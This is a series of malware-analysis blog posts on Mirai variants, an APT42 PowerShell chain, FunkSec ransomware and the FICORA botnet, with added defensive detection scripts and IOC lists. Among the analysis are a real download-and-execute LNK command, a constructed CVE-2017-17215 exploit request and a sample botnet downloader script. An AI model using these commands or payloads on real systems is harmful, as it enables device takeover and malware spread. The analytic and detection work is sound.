Friday, January 31, 2025

Mirai botnet among different instruction sets: x86, ARM, PPC, and MIPS with static analysis

 



Summary

The Mirai botnet family was first observed in 2016. The bot scans for IoT devices with a scanner that carries an embedded credential dictionary for brute-force attacks (and, in later variants, exploit code), and it launches DDoS attacks such as TCP flood and UDP flood. After the source code was leaked in late 2016 and mirrored on GitHub, many variants appeared, and botnets remain a major threat to IoT. That makes it worth studying the same family across different instruction sets, which is what this report attempts.

 

 

Technical analysis

 

This sample is a 32-bit ELF executable for Intel 80386 (x86).

The hash

MD5: 6950F28382D7F11E18BDF53F3983117B

The binary is not stripped, so the load segment shows a long list of original source file names. These help an analyst infer which source files were compiled in and what the malware does: for example, "kill.c" suggests it kills processes, and "socket.c" holds the networking code used to reach the C2.


Figure1-Source File List

Figure2-Kill Pid

 

In initConnection the bot connects to its C2, whose address and port are stored in plain text as "31.172.87.248:12345". It then sleeps until it receives a command from the server and hands it to processCmd, which starts the DDoS module (TCP flood, UDP flood and so on) or stops the running attack process. As a caveat, these function names (initConnection, processCmd, getPortz) come from the leaked Gafgyt/Bashlite client source, which many Mirai-like IoT bots borrow code from, rather than from the original Mirai source.


Figure3- InitConnection To Server

Figure4- ProcessCmd With DDoS


Figure5-The Type Of ProcessCmd And Stop Process

 

The TCP flood can set the SYN, RST, FIN, ACK and PSH flags.


Figure6-TCP Flood

 

The getPortz function checks whether the Python, Python3 or Perl binaries exist; if any of them does, it returns "22". If none exists and /usr/sbin/telnetd is also missing, it returns "Unknown Port"; otherwise it returns "22".

Figure7-GetPortz


This x86 build is focused on launching DDoS attacks: it carries no telnet dictionary for credential brute-forcing and no exploit code.

 

 

This sample is a 32-bit ELF executable for ARM.

The hash

MD5: 8ECAFDA00F1F5E5F8E94A10BB94D79B3

 

The binary is stripped: the load segment shows no source file names and the function list contains nothing useful for analysts, so static analysis of this sample takes more time.

Figure8-Function Name About The ELF For ARM

 

The bot embeds an exploit for CVE-2017-17215, a command-injection vulnerability in the UPnP service (TCP/37215) of the Huawei HG532 router. The injected command downloads and runs the bot on the router, so the exploit is used to propagate the botnet.

Figure9- CVE-2017-17215
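A detection check for the exploit traffic described above, added here as an example; it is not code from the page or from the bot. It assumes the publicly documented request shape of CVE-2017-17215 (a SOAP POST to /ctrlt/DeviceUpgrade_1 with shell command substitution inside the NewStatusURL or NewDownloadURL field); the two request texts are constructed samples with RFC 5737 addresses, and the metacharacter list is an assumption.

```python
import re

# Constructed sample: the documented CVE-2017-17215 exploit shape (not captured traffic).
EXPLOIT_REQUEST = """POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r
Host: 192.0.2.10:37215\r
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway"\r
Content-Type: text/xml\r
\r
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>$(/bin/busybox wget -g 198.51.100.7 -l /tmp/.x -r /x.arm7; sh /tmp/.x)</NewStatusURL>
<NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
</u:Upgrade></s:Body></s:Envelope>"""

# Constructed sample: the same action with ordinary URL values.
BENIGN_REQUEST = """POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r
Host: 192.0.2.10:37215\r
Content-Type: text/xml\r
\r
<s:Envelope><s:Body><u:Upgrade>
<NewStatusURL>http://192.0.2.10/status</NewStatusURL>
<NewDownloadURL>http://192.0.2.10/firmware.bin</NewDownloadURL>
</u:Upgrade></s:Body></s:Envelope>"""

UPGRADE_PATH = "/ctrlt/DeviceUpgrade_1"
URL_TAGS = ("NewStatusURL", "NewDownloadURL")
# Shell metacharacters that have no business inside a URL field of this SOAP action
# (assumption: a URL field never needs command substitution, backticks or command chaining).
SHELL_INJECTION = re.compile(r"\$\(|`|;|\|\||&&|\n")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, path, _ = request_line.split(" ", 2)
    return method, path, body


def extract_tag(body, tag):
    """Return the text between <tag> and </tag>, or None when the tag is absent."""
    m = re.search(rf"<{tag}>(.*?)</{tag}>", body, re.S)
    return m.group(1) if m else None


def check_cve_2017_17215(raw):
    """Return {'upgrade_action': bool, 'injections': [findings]} for one request."""
    method, path, body = parse_request(raw)
    result = {"upgrade_action": method == "POST" and path == UPGRADE_PATH, "injections": []}
    if not result["upgrade_action"]:
        return result
    for tag in URL_TAGS:
        value = extract_tag(body, tag)
        if value is not None and SHELL_INJECTION.search(value):
            result["injections"].append(f"{tag}: shell metacharacters in URL field: {value.strip()[:60]}")
    return result


if __name__ == "__main__":
    for name, req in (("exploit", EXPLOIT_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, check_cve_2017_17215(req))
```

Any request to the DeviceUpgrade action arriving on the WAN side of a home router is already worth an alert; the metacharacter check separates the command-injection attempt from a legitimate upgrade request. The `;` in the list can appear in unusual but legitimate URLs, so tune that entry against your own traffic before turning the check into a blocking rule.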

 

The bot also embeds a credential dictionary for brute-force attacks.

Figure10-A Dictionary For Brute Force

 

The bot kills competing processes without a plain-text target list. linux_eabi_syscall is the disassembler's name for the ARM EABI system-call stub (svc 0 with the syscall number in r7); number 37 is kill(2) on 32-bit ARM.

Figure11-Kill Other Process

 

The bot renames its process to hide the real name from process listings, which makes it harder for a cleanup tool, or a competing bot's killer, on the victim host to find and kill it.

Figure12-Change The Real Process


This ARM variant is clearly harder to analyze than the x86 one.



This sample is a 32-bit ELF executable for PowerPC.

The hash

MD5: C6F057C974B24F6ABDAC5B76B10040B9

 

The load segment shows only the "ppc-asm.h" include in its file list, and the function list again contains nothing useful for analysts.

Figure13-Load Segment

 

It uses crontab to schedule a task defined in a "bot.conf" file and installs the bot so that it runs as a service.

Figure14- Crontab And Service

 

The bot kills competing processes without a plain-text target list. linux_syscall is the PowerPC system-call stub (the sc instruction with the syscall number in r0); number 37 is kill(2) on PowerPC as well.

Figure15-Kill Other Process

 

The bot renames its process to hide the real name from process listings, so that a cleanup tool or a competing bot on the victim host cannot easily find and kill it.

Figure16- Change The Real Process

 

This version contains neither brute-force nor exploit code.



This sample is a 32-bit ELF executable for MIPS.

The hash

MD5: CE6B524DB5612552294B5661EFFED7BD

 

The binary is stripped: the load segment shows no source file names and the function list contains nothing useful for analysts, so static analysis of this sample takes more time.

Figure17-Function Name About The ELF For MIPS

 

The entry point of this Mirai variant is still easy to find: sub_40BA5C is the main routine.

Figure18-The Entry

 

A credential dictionary for brute-force attacks is embedded in the MIPS build, as shown below.

Figure19- Brute Force

 

On MIPS (o32 ABI) system-call numbers start at 4000, and "__asm { syscall }" is the decompiler's rendering of the syscall instruction (number in $v0). Number 4170 is 4000 + 170, i.e. connect(2), used here to connect the C2 socket.

Figure20-Snippet For Connect

 

Usernames and passwords are obfuscated with a single-byte XOR; the key is 0x37.

Figure21-Xor Algorithm
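Recovering such a key without reading the decryption routine, as an added example that is not part of the original post or the sample's code: the block below brute-forces all 256 single-byte keys over a credential table and scores each candidate by how many known default credentials (a "crib" list) it reveals, falling back to printability. The NUL-separated table layout, the crib list and the sample table (built here from a constructed credential list with key 0x37) are assumptions.

```python
import string

# Constructed crib list of common IoT default credentials (an assumption).
KNOWN_CREDS = ("root", "admin", "xc3511", "vizxv")
PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")


def xor_bytes(data, key):
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def recover_xor_key(blob, cribs=KNOWN_CREDS):
    """Try all 256 keys; prefer the one exposing the most cribs, then the most printable text."""
    best = None
    for key in range(256):
        plain = xor_bytes(blob, key)
        entries = plain.split(b"\x00")  # assumption: entries are NUL-terminated
        crib_hits = sum(1 for c in cribs if c.encode() in entries)
        printable = sum(1 for b in plain if b in PRINTABLE or b == 0)
        score = (crib_hits, printable)
        if best is None or score > best[0]:
            best = (score, key)
    return best[1]


def decode_credential_table(blob, key):
    """Decrypt the table and return its non-empty entries as strings."""
    return [e.decode("ascii", "replace") for e in xor_bytes(blob, key).split(b"\x00") if e]


# Constructed sample table: NUL-separated credentials encrypted with key 0x37.
SAMPLE_TABLE = xor_bytes(b"root\x00xc3511\x00admin\x00admin\x00vizxv\x00", 0x37)

if __name__ == "__main__":
    key = recover_xor_key(SAMPLE_TABLE)
    print(hex(key), decode_credential_table(SAMPLE_TABLE, key))
```

The same routine works on the original Mirai table: its 4-byte key 0xDEADBEEF is applied byte by byte, which collapses to the single byte 0x22, and variants that only rotate the key (like the 0x37 seen here) are recovered in one pass. If no crib matches at all, the printability score still usually points at the right key, but verify the top candidate by hand.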

 

The IP address "41.216.189.127" is a decoy: sub_413780 replaces it at runtime with the real C2 address in order to hide the real server from string analysis (the same trick as the FAKE_CNC_ADDR/resolve_cnc_addr pair in the leaked Mirai source).

Figure22- sub_413780 Changes The Fake IP Address

 

This variant obfuscates its strings twice, with two layers of encoding, which makes analysis more laborious; future variants may stack further obfuscation techniques for anti-analysis.

Figure23-Double obfuscation

 

Clearly, the MIPS variant of Mirai is the hardest of the four to analyze statically because of its obfuscation.

 

 

 

IOCs

6950F28382D7F11E18BDF53F3983117B

8ECAFDA00F1F5E5F8E94A10BB94D79B3

C6F057C974B24F6ABDAC5B76B10040B9

CE6B524DB5612552294B5661EFFED7BD

 

Conclusion

From the static analysis above we learn only a limited amount about these Mirai builds across architectures, especially where obfuscation is used. We can find the main routine and the basic structure of the bot as a starting point, but a complete analysis still takes considerably more time and effort.

 End.


Sunday, January 26, 2025

APT42 phishing campaigns and malicious code like soldiers hiding deep in the jungle

 

Summary

I recently noticed that Google's Threat Analysis Group was sharing insights on APT42. During 2024 I paid more attention to APT groups conducting phishing around the world; as you know, LNK files have been a popular phishing vector for delivering malware for many years, and PowerShell is now very popular for building malware too. So I want to analyze the APT42 sample shared by TAG.

 

Technical analysis

 

SHA256: c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3

Link information for property store data block.

Figure1- Link Information For Property

 

The extracted command line, which is lightly obfuscated, is:

C:\Windows\System32\cmd.exe /c "set mv=popdsxwerpdsxshpdsxell -wpdsx pdsx1 "$epdsxs=(wgepdsxt -Urpdsxi  https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicpdsxParsing).Content;&(gcm i?x)$es" & call %mv:pdsx=%"

String replacement: %mv:pdsx=% is cmd.exe's variable substitution syntax; it replaces every occurrence of "pdsx" in the mv variable with an empty string.

Resulting string: after the replacement, mv contains:

powershell -w 1  "$es=(wget -Uri https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicParsing).Content;&(gcm i?x)$es"

-w 1 sets the window style to Hidden, so no PowerShell window is shown to the victim.

Obfuscation: gcm i?x is Get-Command with a wildcard that resolves to iex, the alias of Invoke-Expression; the & operator then invokes it with $es, the downloaded text, as its argument. The junk token "pdsx" and the wildcard lookup exist only to hide the command's purpose from signature-based detection and casual analysis.

Conclusion: the LNK file fetches the next-stage script from hxxps://s3.tebi.io/erfs/pf2ncy.txt and executes it with Invoke-Expression.
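The two deobfuscation steps above, performed programmatically, as an added example that is not part of the original post: the block emulates cmd.exe's `%var:find=repl%` substitution to recover the PowerShell command line, resolves the `gcm i?x` wildcard against a constructed list of common PowerShell aliases, and pulls out the download URL. The command line is the one quoted on the page, embedded here as test input; the alias list and the regular expressions are assumptions.

```python
import fnmatch
import re

# The LNK argument string reported above, reproduced as the sample input.
LNK_ARGS = (
    'C:\\Windows\\System32\\cmd.exe /c "set mv=popdsxwerpdsxshpdsxell -wpdsx pdsx1 '
    '"$epdsxs=(wgepdsxt -Urpdsxi  https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicpdsxParsing)'
    '.Content;&(gcm i?x)$es" & call %mv:pdsx=%"'
)

# set VAR=VALUE & call %VAR:FIND=REPL%   (the junk-token trick used by this LNK)
SET_RE = re.compile(
    r"set\s+(?P<var>\w+)=(?P<val>.*?)\s*&\s*call\s+%(?P=var):(?P<find>[^=]+)=(?P<repl>[^%]*)%"
)

# Constructed list of PowerShell aliases an analyst would expect a wildcard lookup to hit.
COMMON_ALIASES = ("iex", "iwr", "irm", "gcm", "sal", "ii", "ipmo", "saps", "icm")


def deobfuscate_cmd_substitution(cmdline):
    """Apply the cmd.exe substitution %var:find=repl% exactly as cmd.exe would."""
    m = SET_RE.search(cmdline)
    if not m:
        raise ValueError("no set/call substitution pattern found")
    return m.group("val").replace(m.group("find"), m.group("repl"))


def resolve_gcm_wildcard(pattern, aliases=COMMON_ALIASES):
    """Return the aliases a Get-Command wildcard (? = one char, * = any) would match."""
    return sorted(a for a in aliases if fnmatch.fnmatchcase(a, pattern))


def extract_urls(text):
    """Collect http(s) URLs from a command line."""
    return re.findall(r"https?://[^\s\"')]+", text)


if __name__ == "__main__":
    ps = deobfuscate_cmd_substitution(LNK_ARGS)
    print(ps)
    for pat in re.findall(r"gcm\s+(\S+)", ps):
        print(pat, "->", resolve_gcm_wildcard(pat))
    print(extract_urls(ps))
```

Running the block reproduces the command line shown above and maps `i?x` to `iex`, which is why `&(gcm i?x)$es` is simply `Invoke-Expression $es`. The substitution trick is worth handling generically because the junk token and variable name change between campaigns while the `set ... & call %var:junk=%` skeleton stays the same.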

 

 

SHA256: 33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156

This is a PowerShell script. At the beginning it opens the link

https[:]//onedrive.live.com/embed?resid=204D6029500397E2%21127&authkey=!AOecuKGAdx__SEQ&em=2

in Microsoft Edge: a OneDrive document about "the war between Hamas and Israel", used as a decoy to hold the victim's attention and disguise the operator's real purpose.

Figure2- the war between Hamas and Israeli snippet

 

A special and interesting detail is that the script defines a mess of three PowerShell variables holding random content with no real meaning; this is done intentionally to interfere with analysis. The real malicious code is embedded among them, just like soldiers hiding deep in the jungle. 😇

Figure3-malicious code likely with Soldiers hiding deep in the jungle

 

 

Extracting the real code from the chaotic code, like finding those soldiers, leaves malicious code in three parts, discussed in turn below.


Figure4-the main malicious code

 

 

The bbsert function takes a base64-encoded string, decodes it and converts the resulting byte array into a UTF-8 string. The malicious string

'iltaHR0cHM6Ly9taXhlZGludGVnZXJsaW5lYXIuYmFyYmFyYS1kZC1wYWRyb24ud29ya2Vycy5kZXY='

(its base64 portion, aHR0...ZXY=) decodes to the URL https://mixedintegerlinear.barbara-dd-padron.workers.dev. The payload downloaded from that URL is finally executed by the function Gorba, whose parameter is a long string that looks like a public key. Note the custom function Keymaster, which comes from another PowerShell file, SHA256 4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f. That file contains only the Keymaster function, which accepts a parameter, decodes it with FromBase64String, decrypts it with AES and replaces placeholder strings such as "_____dest_____".

Figure5-Keymaster

 

 

SHA256: c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32

This PowerShell script can download files, extract DLLs and ZIPs, grant permissions, start processes or services, use Terminal Services (RDP), create users, configure the firewall, establish SSH tunnels and so on; it is best classified as a Trojan (backdoor).


Figure6-PowerShell Trojan

 

 

IOCs

c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3

33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156

c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32

4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f

 

hxxps://s3api.shop/api/termsrvx64.zip

hxxps://s3api.shop/api/sfile.zip

hxxps://s3api.shop/api/sconfig.zip

hxxps://s3api.shop/api/vmspolicyservice.zip

hxxps://s3api.shop/api/btnsendngip2024.php

hxxps://mixedintegerlinear.barbara-dd-padron.workers.dev

hxxps://s3.tebi.io/erfs/pf2ncy.txt

hxxps://translatorupdater.dns-dynamic.net

End.


Thursday, January 23, 2025

FunkSec Ransomware and Rust Reverse Analysis



Summary

According to Check Point Research, the FunkSec ransomware group first emerged publicly in late 2024 and rapidly gained prominence by claiming over 85 victims, more than any other ransomware group in December. I did this research on a shared sample.

 

Technical Analysis

 

FunkSec ransomware is named after strings found in the binary: the PDB path "funksec.pdb", the ".funksec" file extension and the ransom note. It is written in Rust, runs on Windows and was compiled from a path under "C:\\Users\\Abdellah\\.cargo\\...", with the timestamp "2024-12-31 20:26:29", for the AMD64 architecture and without a packer. It also carries the string "This program requires administrator privileges."


Figure1-Binary Information

Figure2-Ransomware Note Snippet 


Like other ransomware groups, it drops a README file as the ransom note, telling the victim to "stop" and "what happened", including the Bitcoin wallet address, how to buy Bitcoin, how much to pay and the contact ID. The unusual item is the "estimated time for data recovery". Of the many ransomware samples I have analyzed, few include this; it is meant to project a professional, advanced image of the group, and the note also advertises "who they are". In addition it lists three onion sites to visit.


Figure3-Ransomware Note Snippet

 

FunkSec downloads a JPEG from "hxxps://i.imgur.com/HCYQoVR.jpeg" and sets it as the desktop wallpaper. The link was still reachable as of 2025-01-22. The image carries the following words.


Figure4-Wallpaper

 

The binary first runs "net session" to check whether it already has administrative privileges (net session fails unless it is run elevated). If not, it uses the PowerShell "Start-Process" cmdlet to relaunch itself with elevated privileges, typically via the RunAs verb, which raises a UAC prompt unless UAC is disabled.


Figure5- Net session and Start-Process

 

FunkSec encrypts each file and then deletes the original.

Figure6-Tip for “Encrypted and deleted file”

 

Like most ransomware, FunkSec has a main control flow, but it needs careful analysis because the flow has deep and wide branching, so the whole analysis takes more time and effort. The key is to find the entry of the main control flow first.


Figure7-The Entry Of Main Control Flow

 

One of the main control flows is as follows.

1. Create the README file that serves as the ransom note.

2. Run "net session" to check whether the process already has administrative privileges.

3. Download the image from the URL above and set it as the wallpaper.

4. If needed, relaunch itself with administrator privileges.

5. Read USERPROFILE to locate the user's directories.

6. Encrypt each file and delete the original (the encryption scheme is not examined here).
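Detection logic for the elevation step of this control flow (steps 2 and 4), as an added example that is not part of the original post: it correlates process-creation events so that a process whose subtree both runs "net session" and relaunches the same image through "Start-Process ... -Verb RunAs" is flagged. The event records are constructed in the shape of Sysmon Event ID 1 and are not real telemetry; the RunAs verb is an assumption about how the relaunch is expressed.

```python
import re
from collections import defaultdict

# Constructed process-creation events: (timestamp, pid, ppid, image, command line).
EVENTS = [
    ("2024-12-31T20:30:01", 4100, 900, r"C:\Users\victim\Downloads\update.exe", "update.exe"),
    ("2024-12-31T20:30:02", 4120, 4100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c net session"),
    ("2024-12-31T20:30:02", 4121, 4120, r"C:\Windows\System32\net.exe", "net session"),
    ("2024-12-31T20:30:03", 4130, 4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -Command \"Start-Process 'C:\\Users\\victim\\Downloads\\update.exe' -Verb RunAs\""),
    ("2024-12-31T20:31:00", 5000, 900, r"C:\Windows\System32\notepad.exe", "notepad.exe readme.txt"),
]

NET_SESSION_RE = re.compile(r"\bnet(?:\.exe)?\s+session\b", re.I)
SELF_ELEVATE_RE = re.compile(r"start-process\b.*-verb\s+runas", re.I | re.S)


def build_children(events):
    """Map each ppid to the events it spawned."""
    kids = defaultdict(list)
    for ev in events:
        kids[ev[2]].append(ev)
    return kids


def descendants(pid, kids, depth=3):
    """Collect events in pid's subtree, a few levels deep (cmd.exe wrappers add a level)."""
    out, stack = [], [(pid, 0)]
    while stack:
        cur, d = stack.pop()
        if d >= depth:
            continue
        for ev in kids.get(cur, []):
            out.append(ev)
            stack.append((ev[1], d + 1))
    return out


def find_self_elevation(events):
    """Flag processes that probe for admin rights and then relaunch themselves elevated."""
    kids = build_children(events)
    hits = []
    for ts, pid, ppid, image, cmdline in events:
        subtree = descendants(pid, kids)
        probed = any(NET_SESSION_RE.search(e[4]) for e in subtree)
        relaunch = [e for e in subtree
                    if SELF_ELEVATE_RE.search(e[4]) and image.lower() in e[4].lower()]
        if probed and relaunch:
            hits.append({"pid": pid, "image": image, "first_seen": ts,
                         "relaunch_cmd": relaunch[0][4]})
    return hits


if __name__ == "__main__":
    for hit in find_self_elevation(EVENTS):
        print(hit)
```

Requiring both the probe and the relaunch of the same image keeps ordinary admin scripts that run "net session" from firing; the wallpaper download (step 3) from an image-hosting domain by an unsigned binary from the Downloads folder is a second, independent signal worth pairing with this one.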


 

IOCs

2456fdd65bc48203815f22e444d78fb0

https[:]//i.imgur.com/HCYQoVR.jpeg

108[.]160[.]163[.]117

 

Threat Intelligence

Bitcoin wallet address:

bc1qrghnt6cqdsxt0qmlcaq0wcavq6pmfm82vtxfeq

Decryptor file fee:  0.1 BTC

 

Three onion websites:

funkiydk7c6j3vvck5zk2giml2u746fa5irwalw2kjem6tvofji7rwid.onion

funknqn44slwmgwgnewne6bintbooauwkaupik4yrlgtycew3ergraid.onion

funkxxkovrk7ctnggbjnthdajav4ggex53k6m2x3esjwlxrkb3qiztid.onion

 

ransomware note:


End.




Tuesday, January 21, 2025

Mirai: An IoT DDoS Botnet How To Protect and Disguise Itself As Aggressive Attacker Analysis

 


Summary

Since the Mirai source code was published in 2016, botnets of the same family have kept appearing, and IoT security has become a serious challenge. That is why I follow botnet development and research it. Recently Mirai attracted me again, and I wanted to analyze it from a different angle, so here it is.

 

Analysis

 

Protect and Disguise Itself

Like other malware that tries to defeat debugging by analysts, Mirai installs the function anti_gdb_entry (one parameter, the signal number) as its SIGTRAP handler; its only job is to switch the C2 resolver from the decoy address to the real one. The bot then raises SIGTRAP itself. Under gdb the debugger intercepts the trap, the handler never runs and the bot keeps talking to the fake C2. Alongside this, the bot calls unlink on its own path to delete the binary from disk, and it disables the hardware watchdog so the device does not reboot and the bot stays online.


Figure1-anti-debug, delete self and keeping running

 

It uses a random string of length 12, 16, 20 or 24 as the process name, copying it over args[0] with util_strcpy to hide the real name from the command line.


Figure2-Hide argv0

 

It also sets a random process name of length 12 to 32 (a multiple of 4) with prctl(PR_SET_NAME), which changes the name the kernel reports for the process.

Figure3-Hide process name
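A host-side check that turns the three tricks above (self-deletion, overwritten argv[0], prctl name) into indicators, as an added example that is not part of the original post or of Mirai: for each process it compares the /proc/<pid>/exe link with /proc/<pid>/comm and argv[0], and notes when the executable has been unlinked from disk. The classification function takes those three values directly so it can be tested on constructed inputs; the scanner that reads /proc is a thin wrapper around it. The sample values are constructed.

```python
import os


def classify_process(exe_link, comm, argv0):
    """Return indicators for one process, given readlink(/proc/<pid>/exe),
    /proc/<pid>/comm and argv[0] (first field of /proc/<pid>/cmdline)."""
    indicators = []
    if exe_link.endswith(" (deleted)"):
        indicators.append("binary unlinked from disk")
    exe_name = os.path.basename(exe_link.replace(" (deleted)", ""))
    # The kernel truncates comm to 15 characters, so compare against the truncated exe name.
    if comm and comm != exe_name[:15]:
        indicators.append(f"comm {comm!r} differs from exe {exe_name!r}")
    if argv0 and os.path.basename(argv0) != exe_name:
        indicators.append(f"argv[0] {argv0!r} differs from exe {exe_name!r}")
    return indicators


def scan_proc(proc="/proc"):
    """Walk /proc and return {pid: indicators} for processes with at least one indicator."""
    hits = {}
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        base = os.path.join(proc, pid)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
            with open(os.path.join(base, "comm")) as f:
                comm = f.read().strip()
            with open(os.path.join(base, "cmdline"), "rb") as f:
                argv0 = f.read().split(b"\x00")[0].decode(errors="replace")
        except OSError:
            continue  # kernel thread, permission denied, or the process exited
        indicators = classify_process(exe, comm, argv0)
        if indicators:
            hits[int(pid)] = indicators
    return hits


# Constructed samples: a Mirai-like bot after unlink + argv[0] + prctl, and a normal daemon.
MIRAI_LIKE = ("/dev/.x/bot.arm7 (deleted)", "kXv9Qe2pLmZ1", "Hj7sYwQ2nBt4cRe8")
NORMAL = ("/usr/sbin/sshd", "sshd", "/usr/sbin/sshd")

if __name__ == "__main__":
    print(classify_process(*MIRAI_LIKE))
    print(classify_process(*NORMAL))
```

A process that scores all three indicators is almost always either a bot or an upgraded binary that was replaced on disk while running; busybox applets and interpreters legitimately show argv[0] different from the exe, so treat the argv[0] mismatch alone as weak and the "(deleted)" marker combined with a random-looking name as the strong signal.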

 

 

Aggressive Attacker

Mirai kills the processes of known competing bots (the "anime" bot among them) to ensure it is the only bot running on the compromised IoT device.

Figure4-kill anime botnet

 

Mirai kills the processes listening on the telnet, SSH and HTTP ports and then binds those ports itself, so the services cannot restart and other bots cannot get in through the same door.

Figure5-kill tcp/23 telnet

 

A more advanced technique is used against unknown competitors: the killer reads each process's executable through /proc/<pid>/exe, scans it in memory for known bot signatures and kills the process on a match.

Figure6 scan in memory for binary

 

 IoCs

6cd85642bc8cedc2a4b0611aaf2ace54

End.


Sunday, January 19, 2025

Botnet continue to exploit vulnerabilities and FICORA botnet analysis

 


Summary

 

Back on December 26, 2024, FortiGuard Labs reported a new variant named "FICORA" that spreads through documented D-Link vulnerabilities allowing remote attackers to execute commands on the device; the bot then downloads further malware, brute-forces credentials and launches DDoS flooding attacks from the victim hosts.

 

Analysis

 

Why is the botnet named "FICORA"?

The name comes from strings inside the malware.


Figure1- special strings

 

The downloader shell script tries multiple methods (wget, ftpget, tftp and curl) to fetch the FICORA binary, so it succeeds even on minimal firmware where only one of those tools exists.


Figure2-downloader with multiple strategies for fetching the malware

 

 

The shell script uses kill -9 against every process whose name shares the same file extension as the downloaded binaries.


Figure3-downloader with kill -9 command

 

The shell script also tries to find and kill any process containing the keyword "dvrHelper"; the keyword is hex-encoded in the script and can be decoded to plain text. Below is a small part.


Figure4- malware inside hexadecimal script


Figure5- malware inside script with plain text
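A decoder for that hex-escaped style of string hiding, as an added example that is not part of the original post or of the FICORA script: it finds runs of \xHH escapes in a shell script, replaces them with the bytes they encode, and matches the decoded text against a watchlist of Mirai-family markers. The script fragment is constructed (with RFC 5737 addresses) to mimic the pattern described above; the watchlist is an assumption.

```python
import re

# Constructed downloader fragment: a Mirai-style kill loop whose keywords are hidden
# as \x.. escapes inside echo -e and $'...' strings. Not the real FICORA script.
SAMPLE_SCRIPT = r"""#!/bin/sh
for p in $(ps | grep -v grep | grep $(echo -e "\x64\x76\x72\x48\x65\x6c\x70\x65\x72") | awk '{print $1}'); do kill -9 $p; done
cd /tmp; wget http://198.51.100.7/la.bot.arm7 || curl -O http://198.51.100.7/la.bot.arm7
pkill -9 -f $'\x2e\x61\x6e\x69\x6d\x65'
"""

# Two or more consecutive \xHH escapes; single escapes are too noisy to report.
HEX_RUN = re.compile(r"(?:\\x[0-9A-Fa-f]{2}){2,}")

# Constructed watchlist of strings seen in Mirai-family bots and loaders.
WATCHLIST = ("dvrHelper", ".anime", "busybox", "/tmp/.")


def decode_hex_runs(script):
    """Return (decoded_script, decoded_strings) with every \\xHH run replaced by its bytes."""
    found = []

    def repl(m):
        s = bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1")
        found.append(s)
        return s

    return HEX_RUN.sub(repl, script), found


def match_watchlist(script, watchlist=WATCHLIST):
    """Decode the script first, then report which watchlist markers it contains."""
    decoded, _ = decode_hex_runs(script)
    return sorted(w for w in watchlist if w in decoded)


if __name__ == "__main__":
    decoded, strings = decode_hex_runs(SAMPLE_SCRIPT)
    print(strings)
    print(match_watchlist(SAMPLE_SCRIPT))
```

Decoding before matching is the whole point: a grep for "dvrHelper" on the raw script finds nothing, while the decoded text matches immediately. Octal escapes (\151) and base64 wrappers are the next two layers these loaders reach for; handle them the same way, decode first and match second.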

 

As you may know, the loader binaries of the "Mirai" family contain the keyword "dvrHelper", as shown below.


Figure6-loader bin like dlr.arm7

 

FICORA brute-forces credentials with an embedded username and password list.


Figure7-  Brute force attack function with embedded username and password

 

 

The default usernames and passwords embedded in FICORA and in Mirai are very similar.

 

Figure8-username and password compare

 

FICORA and Mirai share multiple similar structures.

 


Figure9-structure compare


Figure10-structure compare

 

 

Comparing "FICORA" with Mirai, matching functions such as "attack_method_udpplain" were identified; the binary diffing tool reports a similarity of 53% with a confidence of 64% for that function.


Figure11-DDoS in udp

 

IOCs

 

downloader md5 cb9f5c8892bffc28f6c12f11d60f5c92

downloader URL

hxxp://103[.]149[.]87[.]69/multi
hxxp://103[.]149[.]87[.]69/la.bot.arc
hxxp://103[.]149[.]87[.]69/la.bot.arm
hxxp://103[.]149[.]87[.]69/la.bot.arm5
hxxp://103[.]149[.]87[.]69/la.bot.arm6
hxxp://103[.]149[.]87[.]69/la.bot.arm7
hxxp://103[.]149[.]87[.]69/la.bot.m68k
hxxp://103[.]149[.]87[.]69/la.bot.mips
hxxp://103[.]149[.]87[.]69/la.bot.mipsel
hxxp://103[.]149[.]87[.]69/la.bot.powerpc
hxxp://103[.]149[.]87[.]69/la.bot.sh4
hxxp://103[.]149[.]87[.]69/la.bot.sparc

 

FICORA md5 233A1A71307FD7CA5946D90D6977E97A

 

Conclusion

It is highly likely that the malware "FICORA" is a variant of the Mirai family; it can be identified by its multiple structural similarities.

End.
